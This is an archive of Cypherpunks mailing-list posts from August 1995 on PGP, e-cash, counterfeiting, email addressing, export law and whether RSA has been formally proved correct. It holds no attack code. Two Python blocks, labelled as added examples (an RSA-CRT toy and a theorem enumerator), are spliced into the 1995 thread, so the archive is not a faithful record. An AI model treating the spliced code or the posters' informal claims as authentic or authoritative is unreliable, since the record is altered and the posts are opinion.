> "Default" when there are more than one key with the same Email Address is
> to use the last one (which would be last in the keyring as well as have the
> latest date).

Which is another good reason why one ought resist the itch to tinker with one
of those PGP keyring sorting programs.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: LIBERTY!! Use it or lose it!!

iQCVAwUBMCOKA974r4kaz3mVAQEKnAP8Cgjwj/9Lol1sXUepgAbh72R+cudYrWz1
F7BWC28as8SrTfYRPtcC3g2jDGbPBJu66FFfY8UjBo3vdMYbOIMxDCfoyqZmAxAg
QY0q8/DoZsJYXwwaxxNJD+3syreT6PyS52ML1GhYGfKrDIObnb4utDzliQ+NJDYT
YL87oqTT0b4=
=A8IV
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: merriman@arn.net (David K. Merriman)
Date: Sat, 5 Aug 95 20:03:29 PDT
To: cypherpunks@toad.com
Subject: Web page
Message-ID: <199508060310.WAA03341@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


I've *finally* gotten a Web page (Netscape optimized, Mosaic tolerant), and
included several links to crypto-related sites. Suggestions, feedback, and
comments welcome.

We now return you to your regularly scheduled flame war :-)

Dave Merriman
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Alan Pugh" <Alan Pugh@MAILSRV2.PCY.MCI.NET>
Date: Sat, 5 Aug 95 19:28:35 PDT
To: cypherpunks@toad.com
Subject: addressing
Message-ID: <01HTQAQQ0ATE8WX734@MAILSRV1.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain


hello all,

while this message has zero cypherpunks content, i'm posting this
information request here because i think there is a good chance that
someone on this list can help me with my question.

a friend of mine who has an mcimail account is having trouble getting
messages to a person in the far east with an address that looks like 
this...

<FLAST+PERMATMS%Perigon@mcimail.com

the 'flast' represents her first initial and last name. 

i've never seen a "%" or "+" in an address before and am wondering
if anyone out there can tell me what they mean, or if they can be resolved 
to a typical net.address. 

thanks for your time.

amp
          *********************************************
          *          / Only God can see the whole     *
          *  O[%\%\%{<>===========================-   *
          *          \ Mandlebrot Set at Once!        *
          * amp                                       *
          * <0003701548@mcimail.com>                  *
          * <alan.pugh@internetmci.com>               *
          *********************************************
Key fingerprint =  A7 97 70 0F E2 5B 95 7C  DB 7C 2B BF 0F E1 69 1D




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: turner@telecheck.com
Date: Sat, 5 Aug 95 23:41:42 PDT
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: PC E-cash (NewsClip)
In-Reply-To: <v02120d01ac481ff41b9f@[199.0.65.105]>
Message-ID: <9508060639.AA11095@TeleCheck.com>
MIME-Version: 1.0
Content-Type: text/plain


> >Secret Service Says Student Used PC To Print Money
> 
> etc.
> 
> This reminds me of something which happened to me last week in a Burger King
> in Chelsea(MA), where the skipper now keeps the boat I grind winches on. I'm
> paying for my lunch and the cashier takes out a felt-tip pen and puts a 
> little mark on my $10 bill.  She tells me that if the pen-stroke turns yellow
> instead of the black one she got with mine, the bill is counterfeit.  She 
> told me she got yellow mark on $10 bill once. Go figure.
> 

I'm surprised that they check, since most counterfeiters don't usually do bills
less than $20, due to the costs associated with printing high quality 
counterfeited bills.

> So now, we have a working minimum competitive cost of on-line digital cash
> verification. The amortized cost of the ink it takes to verify a piece of
> paper cash. What? 20 cents worth of ink? .002 cents?
>

I remember seeing a documentary film on counterfeiting money (don't remember
the title, sorry), and a few Wall Street Journal articles on the subject.  
Some high points:

  1.  	The U.S. dollar costs more than a dollar to print up, not counting
 	distribution.  The paperstock is made out of cotton.. blaa, blaa..
	Several times Congressmen have proposed doing away with one dollar
	bills, and replacing them with coins.  A lot of political flack,
	saying that vending machine people want it so they can knock up the
	price of a Coke to $1.00. 
  
  2.   The same company that supplies the U.S. Treasury with paper stock for
	printing, also supplies France and a few other countries; other 
 	countries have elaborate watermarks and multiple colors to make 
	counterfeiting more difficult.  Holograms were tested with U.S. dollars,
	but failed the dreaded "crumple" test wherein a dollar is placed in a
	steel tube and squashed by a pneumatic press.
  3. 	The U.S. currency is made of a very special color of ink.  They made
	the point that it is not green, and hard to duplicate (yeah...). 
	Secret Service was interviewed during the documentary.

  4.   The Central Intelligence Agency sometimes prints up foreign currency
	to devalue it; the Germans did the same thing in WWII and several
 	million dollars worth of English currency was found in a river 
	somewhere in Europe... (sorry if I'm vague..), near some mine shaft
	(open for public tours) where the Germans stored some stuff (art work?). 

On a related note, there is a company that makes a device which will verify
U.S. bills which is used in banks (mostly in the middle east).  CNN did a 
spot on this last year. 

> More fun with numbers, 
> Bob Hettinga
> 
> P.S. We just put in 12 volt power for the Mac. I also bought an inverter. 
>      Banana daiquiris on the hook. Raise the cocktail flag!
> 

You sniffed the magic currency pen, in the interests of scientific discovery, 
right? :-)  

> 
> -----------------
> Robert Hettinga (rah@shipwright.com)
> Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 
> "Reality is not optional." --Thomas Sowell
> >>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sun, 6 Aug 95 04:28:22 PDT
To: cypherpunks@toad.com
Subject: Re: PC E-cash (NewsClip)
Message-ID: <v02120d00ac4a5731e174@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



>I'm surprised that they check, since most counterfeiters don't usually do bills
>less than $20, due to the costs associated with printing high quality
>counterfeited bills.

Not too surprising for Chelsea. This is the first city to go bankrupt in
the history of the United States. I think it's still in receivership...


Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 6 Aug 95 06:35:40 PDT
To: cypherpunks@toad.com
Subject: addressing
Message-ID: <199508061335.JAA25573@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by Alan.Pugh@MAILSRV2.PCY.MCI.NET ("Alan 
Pugh") on Sat, 05 Aug 10:24 PM


>a friend of mine who has an mcimail account is having 
>trouble getting  messages to a person in the far east 
>with an address that looks like this...
>
><FLAST+PERMATMS%Perigon@mcimail.com
>
>i've never seen a "%" or "+" in an address before and 
>am wondering  if anyone out there can tell me what they 
>mean, or if they can be resolved to a typical 
>net.address. 


   Alan,

   Below is a similarly formatted address here in NYC. It is
   hierarchical, from left: Angelic CU + hir Mad-Dog Dept %
   the Cruel Bastard Org @ Tel Mail Hell.

   <LinetH+aFCRCCOS%Forest_City_Ratner_Companies@mcimail.com>

   If your friend's CBO is like Forest City Ratner, a
   Trump-wanna-be developer pack of urban rabid-rat-infestors,
   then the system was probably set up by a
   do-anything-for-a-fee consultant to a paranoidal CEO who
   buys oddles of pseudo-technical gimmicks for corporate
   obfuscation as a means to pyramidially distance hirself
   from the lowly mite-interminators minimally-paid to
   meta-desecrate the hiroshima-scape.

   According to "LinetH," if you are to the left of a " + "
   you are " - " but hyper-visible to the cyclopian, leering
   "+"-sisadmin eager to catch caged animals using the sys for
   private mail (hey, Bear Stearns-mogul leeches, fail yer
   prostate/mammogram test, LH sez).

   Or so LH quietly e-pecks in PGP, having learned not to
   trust any of the hir-MFs. Shh, the "%"-admin is lurking
   fearfully just left of H@L-admin.












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lharrison@mhv.net (Lynne L. Harrison)
Date: Sun, 6 Aug 95 10:13:27 PDT
To: cypherpunks@toad.com
Subject: Re: pkzip cracking
Message-ID: <9508061713.AA25727@mhv.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 05:17 AM 8/2/95 UTC, an264373@anon.penet.fi wrote:
>
>Does anyone have a utility to crack password encrypted/protected zip 
>files?  Or an address to download one?  All replies / flames / 
>pointers appreciated.


Sauroth -

  Did you ever get a response and, if so, what was the answer?


Regards -
  Lynne

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMCT4GD5A4+Z4Wnt9AQEdGAP+Nne+hetfsjLPNjNeAoWOHCIe14lqWOm3
iXYE8ol7PCf/B0CypYYShkpzX9Y1+319veAPLe6nzHU95TQkEGffwEJpFrLt2IA8
k0azeeRJvEERTVCC+4WUWXvE9ugsAXBn755Eg4HW6lEu1qNp/K3zn4fWGuNLeFna
Wt+Co+O7iQ0=
=s0hA
-----END PGP SIGNATURE-----

********************************************************************
Lynne L. Harrison, Esq.
Poughkeepsie, New York
E-Mail:
lharrison@mhv.net
Lynne.Harrison@Execnet.com

"Say not, 'I have found the truth', but rather, 'I have found a truth.'"
                         - Kahlil Gibran from "The Prophet"
********************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jcaldwel@iquest.net (James Caldwell)
Date: Sun, 6 Aug 95 13:01:33 PDT
To: jya@pipeline.com (John Young)
Subject: Re: addressing
In-Reply-To: <199508061335.JAA25573@pipe2.nyc.pipeline.com>
Message-ID: <m0sfBnU-001eF8C@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text


John Young wrote:
> 

Gotta love the perspective John brings to something such as e-mail addresses.
;-)

 
> Responding to msg by Alan.Pugh@MAILSRV2.PCY.MCI.NET ("Alan 
> Pugh") on Sat, 05 Aug 10:24 PM

>    If your friend's CBO is like Forest City Ratner, a
>    Trump-wanna-be developer pack of urban rabid-rat-infestors,
>    then the system was probably set up by a
>    do-anything-for-a-fee consultant to a paranoidal CEO who
>    buys oddles of pseudo-technical gimmicks for corporate
>    obfuscation as a means to pyramidially distance hirself
>    from the lowly mite-interminators minimally-paid to
>    meta-desecrate the hiroshima

Lemme guess, you've read Stand on Zanzibar and liked the news reports?


-- 
So you may wonder -- "But what does that have to do with me?"  
Answer: I have locked horns with "The Devil", buddy boy, 
and compared to  him, you ain't sh**.
 Brian Francis Redman to Chip Berlet






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joey Grasty" <jgrasty@gate.net>
Date: Sun, 6 Aug 95 13:13:19 PDT
To: cypherpunks@toad.com
Subject: Questions about SMTP and NNTP
Message-ID: <199508062011.QAA28350@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


C-punks:

While working on the SMTP and NNTP clients for the WinSock remailer,
I have uncovered two questions I don't know the answer to.  Here they
are:

1.  When sending a message to the SMTP server, I use scenario 4 as
    shown in RFC821 as a basis for my client.  There seems to be a 
    huge security hole in SMTP.  I can use just about any name 
    when sending the VRFY command.  For example, I could connect to
    "sensemedia.com" and pretend to be "tcmay".  Is there something
    I'm missing here or is there really that big a security hole in
    SMTP?

2.  How do you do user authentication in NNTP?  There's nothing about
    it in RFC977.  Is there a later RFC that describes how to do user
    authentication?  All of my newsreaders support this function, but
    I haven't been able to figure out how to do it.

Any help you can give me would be appreciated.

ObWinSock Remailer:  I have the POP3, NNTP and SMTP clients functional
now.  With luck, I'll have an alpha test version of the remailer in 
two or three weeks.

ObCypherPunks:  Is the list down?  I haven't heard a peep since about
noon.  I send a "who cypherpunks" to majordomo and received a quick 
reply which shows I'm still subscribed.  Any idea?

Regards,

--
Joey Grasty
jgrasty@gate.net [home -- encryption, privacy, RKBA and other hopeless causes]
jgrasty@pts.mot.com [work -- designing pagers]
"Anyone who considers arithmetical methods of producing random digits is,
of course, in a state of sin." -- John Von Neumann




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Sun, 6 Aug 95 16:27:06 PDT
To: Matt Miszewski <cypherpunks@toad.com
Subject: Re: MS Money password problem
Message-ID: <ac4a9e2500021004ad0d@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:34 PM 8/21/95, Matt Miszewski wrote:
>We recently lost (ok fired) our office manager, but not before she put
>nifty passwords on all the MS Money data we had and now she has, of
>course, gone on a three week vacation.  I have all the relevant WP
>password retrieving mechanisms but not one for MS Money.
>
>Anyone with pointers or programs, your help would be greatly appreciated.

This, of course, is the rationale for the "key escrow" systems (as opposed
to the government-mandated "key escrow" proposals, which are not an
"escrow" system of this kind).

"Escrow" is sufficiently overloaded with real estate connotations that I
wish the industry would adopt a different term. Carl Ellison's "GAK" is
cute, but is hardly likely to ever be adopted widely.

(No, I'm not calling for another round of suggested names, just opining
that "key escrow" is a terrible name.)

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joe McGuckin <joe@ns.via.net>
Date: Sun, 6 Aug 95 18:38:56 PDT
To: cypherpunks@toad.com
Subject: Encrypted internet traffic to Singapore??
Message-ID: <199508070138.SAA12404@ns.via.net>
MIME-Version: 1.0
Content-Type: text/plain


A client of mine wishes to set up a connection to their
Singapore office using the internet rather than a dedicated 
leased line.

They would like to encrypt the data going between the branch
office in Singapore and the home office in California. 

I am considering using something like swIPe for this? Seem reasonable?
The data is not very secret, they merely wish to foil 'hacker' type
eavesdroppers.

Also, what are the legal ramifications? Can I get an export license 
for this? Is there an encryption method that doesn't require an
export license?  What laws does Singapore have on encryption?

Is swIPe legal? That is, are any patents being misappropriated by the
current version?  I see announcements on this list about DH and Public 
Key software being released. I would assume that these software tidbits 
are technically illegal for commercial use?

Thanks,

Joe




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Sun, 6 Aug 95 03:16:44 PDT
To: gnu@toad.com (John Gilmore)
Subject: Re: NRC Panel, Law Enforcement questions
In-Reply-To: <9508020134.AA07797@toad.com>
Message-ID: <199508061016.UAA14365@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


Hello cypherpunks@toad.com
  and John Gilmore <gnu@toad.com>

... [Questions] ...
> How many subpoenas for telephone billing records are made by Federal
... Eg.
> "50% fishing expedition, 22% the subject is in custody for a crime
> (break down by which crimes), 5% the subject is suspected of a crime
> (break down), 10% the subject is not suspected of a crime but there
> may be evidence of someone else's crime in their phone records".
...

What are the other 13% for?


Thanks for a realistic sample answer anyway :-)

Jiri
--
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Miszewski <crypto@midex.com>
Date: Sun, 6 Aug 95 12:24:16 PDT
To: cypherpunks@toad.com
Subject: MS Money password problem
Message-ID: <Pine.3.89.9508062007.A19303-0100000@shaq.midex.com>
MIME-Version: 1.0
Content-Type: text/plain


We recently lost (ok fired) our office manager, but not before she put 
nifty passwords on all the MS Money data we had and now she has, of 
course, gone on a three week vacation.  I have all the relevant WP 
password retrieving mechanisms but not one for MS Money.

Anyone with pointers or programs, your help would be greatly appreciated.

Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Sun, 6 Aug 95 18:51:07 PDT
To: solman@MIT.EDU
Subject: Re: RSA has been proved correct
In-Reply-To: <9508050806.AA22214@ua.MIT.EDU>
Message-ID: <Pine.3.89.9508061931.B8642-0100000@maria.bga.com>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 5 Aug 1995 solman@MIT.EDU wrote:

> Tim quoth:
> 
> |> I was reading the logic programming/theorem proving chapter of my new
> |> Russell and Norvig book on AI, and came across something I once knew about
> |> but had forgotten: the Boyer-Moore theorem prover was applied to the RSA
> |> algorithm and the correctness of it was verified. Correctness in the sense
> |> of showing that outputs match formal specs, for all inputs.
> 
> |> The paper is: Boyer, R.S and Moore, J.S. (1984). Proof checking the RSA
> |> public key encryption algorithm, "American Mathematical Monthly,"
> |> 91(3):181-189.
> 
> Given the enormous difficulty of ensuring security in a world of
> ubiquitous distributed computing, I'm as big a fan as any of formal
> methods. But Tim's post hammers home the big fault of formal methods:
> the possibility that people will come to rely upon them. I have
> paranoid visions of people finally accepting formal methods in a decade
> or so, and then becoming dependent on them... forgeting the enormous
> potential for error that will always exist in such systems.
> 
> If somebody told me that intentionally letting a few violent criminals
> free each year is a good idea because it would keep me on my toes, I
> would think that person is an idiot. But I'm not entirely convinced that
> it is a bad idea to avoid formal methods because they could breed
> complacency.
> 
> Cheers,
> 
> JWS

The problem is that these "formal methods" are themselves unproved and, 
in the general sense, unprovable.  Using a computer program to verify RSA 
is like using number theory to verify some proof in set theory--you may 
succeed, but so what?  The RSA algorithm works because of some basic (and 
not quite so basic) facts of number theory.  Number theory is assumed in 
the design of computers, of processors, of operating systems, and of 
programs.

To put the question succinctly, would you trust a theorem "prover" to 
verify its own accuracy?


The RSA algorithm:

Select primes p and q  and an exponent e, such that gcd(e,p-1) = 
gcd(e,q-1) = 1.  (In practice, we would want log_2(q) << e >> log_2(p).)
Publish e and pq.  Find d_1, d_2 such that d_1 and d_2 are inverses of e 
in Z_p-1 and Z_q-1 respectively.  A message Y (from 0 to pq-1) is 
transformed into X = Y^e mod qp.  When you receive a message X, let X_1 = 
X mod p and X_2 = X mod q.  Let Y_1 = X_1^d_1 mod p and Y_2 = X_2^d_2 mod 
q.  Use the Chinese Remainder Theorem to find Z (from 0 to pq-1) such 
that Z = Y_1 mod p1 and Z = Y_2 mod p2.

Theorem: Z = Y.
Pf:
Let p_1 = p and p_2 = q
a) Observe that in F_p_i, (Y^e)^d_i = Y^(e*d_i) = Y^(r*(p-1)+1) = 
        Y^((p-1)*r) * Y= (Y^(p-1))^r * Y = 1^r * Y = Y.

b)  There exist p,q,e triples.
  If we let the order of our selection be p,e,q then we observe that we are
  free in our selection of p, and that our selection of e is not very 
  constrained.  ((p-1)/2 +- 1 being obvious examples).  We then observe 
  that any arithmetic progression of integers which does not obviously 
  consist entirely of composites must contain an infinite number of 
  primes, and observe that the condition that gcd(q-1,e) = 1 defines just 
  such a progression.
  
c) The d's can be found
  See Euclid's Algorithm

d) Z_pq is the (ring) direct sum of Z_p and Z_q

QED

(Observe that the Chinese Remainder Theorem works on arbitrary ring direct 
sums.)


Why this exercise?  Because not _one_ of the cited theorems is modern.  
The only thing in this proof unknown to Fermat, Galois, Euclid, and the 
Middle Age Chinese is that bit about arithmetic progressions and primes, 
which may have been known to Fermat or Euclid.  If I am informed that a 
theorem "prover" has "verified" this theorem, then I am led to believe 
that the "prover" is not obviously broken.  My confidence (as an 
algorithm--this is a separate issue from decryption resistance) in RSA has 
_NOTHING_ to do with what some theorem "prover" may or may not have to 
say about it.  Such statements serve only to inform that these "provers" 
are broken (if they don't like it), or that they conceivably do "verify" 
proofs (if they do).

OTOH, the theorems and axiom systems corresponding to these theorem 
"provers" are very complex, and quite subtle at points.  Plug in the 
latest attempt at Fermat's Last (as opposed to his Little) theorem, and 
tell me if it's good.  Do the classification of finite groups.  I know, 
there is a 125-page attempt at the Poincare' conjecture.  Try it.  If 
these "provers" find heretofore unobserved flaws, THEN I'll concede that 
they would be useful tools in mathematics--in uncovering flaws.  But they 
_still_ don't "prove" that these theorems are correct.  They only 
convince themselves.  But convincing me that I should believe them 
involves convincing me that there has been no failure in the program--at 
any of the levels I've previously discussed.  And, by the way, this is why 
the general mathematical community is still suspicious of the 4-color 
theorem.  In fact, the original "proof" contained a number of flaws.  
All discovered were easily patched, but the fact that they existed in 
the first place means that we have no reason to believe that something 
subtle is yet to be discovered.

Nathan
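
The construction in the message above, worked through in Python as an added example (not part of the original post or of any RSA library): d_1 and d_2 from Euclid's algorithm, decryption through the Chinese Remainder Theorem, and an exhaustive check that Z = Y. The primes 61 and 53 and the exponent 17 are constructed sample values, far too small for real use; all function names are assumptions.

```python
from math import gcd


def ext_gcd(a, b):
    """Extended Euclid: return (g, s, t) with a*s + b*t == g == gcd(a, b)."""
    old_r, r = a, b
    old_s, s = 1, 0
    old_t, t = 0, 1
    while r:
        k = old_r // r
        old_r, r = r, old_r - k * r
        old_s, s = s, old_s - k * s
        old_t, t = t, old_t - k * t
    return old_r, old_s, old_t


def inverse(a, m):
    """Multiplicative inverse of a modulo m (step c of the proof)."""
    g, s, _ = ext_gcd(a % m, m)
    if g != 1:
        raise ValueError(f"{a} has no inverse modulo {m}")
    return s % m


def make_key(p, q, e):
    """Check gcd(e,p-1) = gcd(e,q-1) = 1 and compute d_1, d_2."""
    if p == q or gcd(e, p - 1) != 1 or gcd(e, q - 1) != 1:
        raise ValueError("need distinct primes with gcd(e,p-1) = gcd(e,q-1) = 1")
    return {
        "p": p, "q": q, "e": e, "n": p * q,
        "d1": inverse(e, p - 1),   # inverse of e in Z_(p-1)
        "d2": inverse(e, q - 1),   # inverse of e in Z_(q-1)
    }


def encrypt(Y, e, n):
    """X = Y^e mod pq."""
    return pow(Y, e, n)


def decrypt_crt(X, key):
    """Recover Z from X using the two half-size exponentiations and the CRT."""
    p, q = key["p"], key["q"]
    Y1 = pow(X % p, key["d1"], p)          # Y_1 = X_1^d_1 mod p
    Y2 = pow(X % q, key["d2"], q)          # Y_2 = X_2^d_2 mod q
    # CRT recombination: the unique Z in 0..pq-1 with Z = Y1 (mod p), Z = Y2 (mod q)
    h = ((Y2 - Y1) * inverse(p, q)) % q
    return Y1 + p * h


def check_all(key):
    """Return every Y in 0..pq-1 for which decryption does not give Y back.

    The range includes Y divisible by p or q, where Y^(p-1) is 0 rather
    than 1 modulo that prime and (Y^e)^d_i = Y holds because both sides are 0.
    """
    return [Y for Y in range(key["n"])
            if decrypt_crt(encrypt(Y, key["e"], key["n"]), key) != Y]


if __name__ == "__main__":
    key = make_key(61, 53, 17)             # constructed toy parameters
    X = encrypt(65, key["e"], key["n"])
    print("d_1, d_2 =", key["d1"], key["d2"])
    print("X =", X, " Z =", decrypt_crt(X, key))
    print("failures over all Y:", check_all(key))
```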




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@valhalla.phoenix.net (Anonymous)
Date: Sun, 6 Aug 95 19:45:21 PDT
To: cypherpunks@toad.com
Subject: FC's Typs? (NewsClip)
Message-ID: <199508070245.VAA16849@ valhalla.phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain




FBI may have partial set of Unabomber's prints


Washington, Aug. 6 (Reuter) -- The FBI may have a partial set
of fingerprints from the elusive Unabomber, now considered the
country's most wanted man, Newsweek magazine reported Sunday.

The partial set of prints, lifted from an explosive device
mailed several years ago, were uncovered with newly available
forensic technology, the magazine said.

While not certain the fingerprints belong to the serial
bomber, the report said federal agents believe that
identifying the prints could lead them to the Unabomber, whose
letter bombs have killed three people and injured 23 others
over 17 years.

Federal agents are seeking the bomber by looking for machines
he might use to construct his home-made pipe bombs, and are
trying to track the manual typewriter used to write the
bomber's lengthy anti-technology manifestos, Newsweek
reported.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Handler <grendel@netaxs.com>
Date: Sun, 6 Aug 95 20:23:53 PDT
To: Nathan Zook <nzook@bga.com>
Subject: Re: Pat Robertson Fears E-cash?
In-Reply-To: <Pine.3.89.9508020058.E23934-0100000@maria.bga.com>
Message-ID: <Pine.SUN.3.91.950806232140.17572A-100000@unix1.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 2 Aug 1995, Nathan Zook wrote:
> I believe that Pat Robertson is not aware of the privacy-enhancing 
> capabilities of e-cash.  In a probabilistic sense, he may well be right.

Not true. In the 700 Club transcript I have, David Chaum is interviewed, 
and the blinded digital cash he has invented is portrayed in a very 
positive light, as a way of enabling digital cash and avoiding the 
prophecies of Revelation.

There are more fundamentalist Christians involved in the crypto movement 
than you realize.
--
Michael Handler      | Cypherpunks: Civil Liberty through Complex Mathematics
handler@sub-rosa.com | 
grendel@netaxs.com   | "Let me ride on the Frankfort El, one more time..."
Philadelphia, PA     |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Sun, 6 Aug 95 20:29:50 PDT
To: nzook@bga.com (Nathan Zook)
Subject: Re: RSA has been proved correct
In-Reply-To: <Pine.3.89.9508061931.B8642-0100000@maria.bga.com>
Message-ID: <199508070329.XAA11774@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> there is a 125-page attempt at the Poincare' conjecture.  Try it.  If 
> these "provers" find heretofore unobserved flaws, THEN I'll concede that 
> they would be useful tools in mathematics--in uncovering flaws.  But they 
> _still_ don't "prove" that these theorems are correct.  They only 
> convince themselves.  But convincing me that I should believe them 
> involves convincing me that there has been no failure in the program--at 
> any of the levels I've previously discussed.  And, by the way, this is why 
> the general mathematical community is still suspicious of the 4-color 
> theorem.  In fact, the orginal "proof" contained a number of flaws.  
> All discovered were all easily patched, but the fact that they existed in 
> the first place means that we have no reason to believe that something 
> subtle is yet to be discovered.


   All you need to do is verify yourself (i.e. formally prove the
correctness of the theorem prover) to rely on the results of the
theorem prover. It's the web of trust model. And before you jump up and 
say "but how can you prove the theorem prover, maybe Godel...", there is a 
very simple theorem prover that is provable via mathematical induction. If 
you don't trust induction, then I don't know what to tell you. (it's like 
denying the Peano postulates) The theorem prover works like this:

Start off with your axiom set and your rules of production. (for instance,
a context free grammar, that might say "if x+y=z is a theorem, then
x+(y+1)=z+1 is a theorem") And enumerate all possible theorems on
the parse tree. If you reach theorems of length N that exceed the
theorem you're trying to prove then either it is a nontheorem or
undecidable. This procedure will never produce a "yes" answer for
a false theorem, although it will fail to prove some theorems. And it is
news to me that "the general mathematical community is still suspicious of
the four color theorem." Not only are they not suspicious of the theorem,
they aren't suspicious of the proof. It's been verified and reproduced
over and over again, and it has also been shortened down from the
original (I believe 2000+ special graph cases) to just over 400.
Physicists aren't suspicious of relativity either.
[note above: the theorem prover fails if the production rules allow
theorem shortening. The system must be primitive recursive, but there
are many restricted domains of theorem proving which are.]


  The classification of the simple groups was a 1000+ page written
proof. Which one would you trust to have a mistake somewhere? The
computer checked one, or the human checked one?

  This general line of discussion is getting out of hand. You can't
*prove* anything for sure. Even if it seems logical to you, how do you
know your own mind isn't buggy? How do you know you're not hallucinating?
Even something as simple as Euclid's proof of the infinitude of primes.
You think it's been proved? ha! You are merely delusional. The rest of
us sane people saw the disproof years ago, but every time you start
to read the disproof, your mind goes into its own little universe
and starts substituting in screen memories making you *think* 
you just read a proof, not a disproof.
 
  Ultimately, you can't even trust yourself. The world is a risky
place, and sometimes you just have to live with the fact that one
day, something you chose to place faith in and rely on is going to be
pulled from underneath you.

-Ray
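
The enumerating prover described above, as an added Python example that is not part of the original post. The tally-mark notation, the single axiom and the second production rule are assumptions chosen for illustration; the first rule is the post's "x+(y+1)=z+1", and the length cutoff is the one the post describes.

```python
import re
from collections import deque

# A statement "x+y=z" is written in tally marks as x dashes, 'p', y dashes,
# 'q', z dashes (assumed notation), so every rule application adds characters.
STATEMENT = re.compile(r"^(-+)p(-+)q(-+)$")

AXIOMS = ["-p-q--"]                      # assumed axiom: 1 + 1 = 2


def encode(x, y, z):
    """Write the statement x+y=z in tally-mark form."""
    return "-" * x + "p" + "-" * y + "q" + "-" * z


def rule_inc_right(s):
    """The post's rule: if x+y=z is a theorem, so is x+(y+1)=z+1."""
    x, y, z = STATEMENT.match(s).groups()
    return f"{x}p{y}-q{z}-"


def rule_inc_left(s):
    """Assumed companion rule: if x+y=z is a theorem, so is (x+1)+y=z+1."""
    x, y, z = STATEMENT.match(s).groups()
    return f"{x}-p{y}q{z}-"


RULES = [rule_inc_right, rule_inc_left]


def prove(target, axioms=AXIOMS, rules=RULES):
    """Enumerate theorems breadth-first up to len(target).

    Returns the derivation (axiom first, target last) if the target is
    produced, or None once every remaining candidate is longer than the
    target.  A rule that shortens a string makes the cutoff unsound, so
    it is rejected with ValueError.
    """
    limit = len(target)
    parent = {a: None for a in axioms}
    queue = deque(a for a in axioms if len(a) <= limit)
    while queue:
        s = queue.popleft()
        if s == target:
            path = []
            while s is not None:         # walk back to the axiom
                path.append(s)
                s = parent[s]
            return path[::-1]
        for rule in rules:
            t = rule(s)
            if len(t) < len(s):
                raise ValueError("production rule shortens theorems; "
                                 "the length cutoff cannot be trusted")
            if len(t) <= limit and t not in parent:
                parent[t] = s
                queue.append(t)
    return None


if __name__ == "__main__":
    print(prove(encode(2, 3, 5)))        # a derivation of 2+3=5
    print(prove(encode(2, 2, 5)))        # None: never answers yes for 2+2=5
```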





 









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Sun, 6 Aug 95 21:29:57 PDT
